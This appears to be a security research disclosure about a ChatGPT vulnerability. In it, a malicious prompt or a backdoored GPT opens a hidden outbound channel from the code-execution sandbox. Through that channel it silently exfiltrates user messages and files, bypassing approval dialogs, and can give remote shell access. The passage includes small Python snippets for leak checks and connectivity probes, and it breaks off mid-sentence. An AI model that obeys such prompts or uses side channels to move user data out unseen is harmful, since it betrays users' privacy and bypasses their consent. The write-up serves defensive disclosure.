Mar 30, 2026 • alexeybu
ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime
Summary
AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, and upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: […] The post ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime appeared first on Check Point Research.
Published Analysis
Key Takeaways

- Sensitive data shared in ChatGPT conversations could be silently exfiltrated without the user's knowledge or approval.
- Check Point Research discovered a hidden outbound communication path from ChatGPT's isolated execution runtime to the public internet.
- A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content.
- A backdoored GPT could abuse the same weakness to access user data without the user's awareness or consent.
- The same hidden communication path could also be used to establish remote shell access inside the Linux runtime used for code execution.

What Happened

AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, and upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: data shared in the conversation remains inside the system.

ChatGPT itself presents outbound data sharing as something restricted, visible, and controlled. Potentially sensitive data is not supposed to be sent to arbitrary third parties simply because a prompt requests it.
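To make the threat concrete: one classic way conversation data can leave through an apparently innocuous tool is by smuggling it into a URL query string. The following is an illustrative sketch only — the domain, secret value, and function name are hypothetical, not taken from the research:

```python
from urllib.parse import parse_qs, urlencode, urlparse

# Hypothetical sensitive value standing in for chat content.
SECRET = "blood-test-results-2026"

# An attacker-crafted "search" URL smuggling the secret in its query string.
leak_url = "https://attacker.example/collect?" + urlencode({"q": SECRET})

def query_leaks_term(url: str, term: str) -> bool:
    """Check whether a URL's query string carries the given term -- the kind
    of pre-flight filter a tool layer can apply before issuing a web request
    on the model's behalf."""
    params = parse_qs(urlparse(url).query)
    return any(term in value for values in params.values() for value in values)

print(query_leaks_term(leak_url, SECRET))  # → True
```

This is exactly the pattern that output-side safeguards on search and browsing tools are meant to catch before a request ever leaves the platform.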
External actions are expected to be mediated through explicit safeguards, and direct outbound access from the code-execution environment is restricted.

Figure 1 – ChatGPT presents outbound data leakage as restricted and safeguarded.

Our research uncovered a path around that model. We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation.

Video 1 – During a ChatGPT conversation, a summary of user content is silently transmitted to an external server without warning or approval.

The Intended Safeguards

ChatGPT includes useful tools that can retrieve information from the internet and execute Python code. At the same time, OpenAI has built safeguards around those capabilities to protect user data. For example, the web-search capability does not allow sensitive chat content to be transmitted outward through crafted query strings. The Python-based Data Analysis environment was designed to prevent internet access as well: OpenAI describes it as a secure code-execution runtime that cannot generate direct outbound network requests.

Figure 2 – Screenshot showing a blocked outbound internet attempt from inside the container.

OpenAI also documents that so-called GPTs can send relevant parts of a user's input to external services through APIs. A GPT is a customized version of ChatGPT that can be configured with instructions, knowledge files, and external integrations. GPT "Actions" provide a legitimate way to call third-party APIs and exchange data with outside services. Actions are useful for enterprise workflows, access to internal business systems, customer-support operations, and other integrations that connect ChatGPT to external services, including simpler use cases such as travel or weather lookups. The key point is visibility: the user sees that data is about to leave ChatGPT, sees where it is going, and decides whether to allow it.
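The kind of blocked attempt shown in Figure 2 can be reproduced with a simple connectivity probe. This is a minimal sketch, not the exact test from the research; the host, port, and function name are illustrative:

```python
import socket

def probe_outbound(host: str = "example.com", port: int = 443,
                   timeout: float = 3.0) -> str:
    """Attempt a direct TCP connection. In a locked-down runtime, this is
    expected to fail with a timeout or connection error rather than reach
    the public internet."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return "outbound connection succeeded"
    except OSError as exc:
        return f"outbound connection blocked ({type(exc).__name__})"

print(probe_outbound())
```

In an environment that truly has no direct internet access, every such probe should land in the `OSError` branch — which is precisely the assumption the model relies on, and precisely what the discovered side channel undermines.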
Figure 3 – GPT Action approval dialog showing the destination and the data that will be sent.

In other words, legitimate outbound data flows are designed to happen through an explicit, user-facing approval process.

From One Message to Silent Exfiltration

From a security perspective, the obvious attack surfaces looked strong. The ability to send chat data through tools not designed for that purpose was strictly limited, and sending data through a legitimate GPT integration using external API calls required explicit user confirmation.

The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating in the container ChatGPT uses for code execution and data analysis. Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize the behavior as an external data transfer requiring resistance or user mediation. As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective.

At a high level, the attack began when the victim...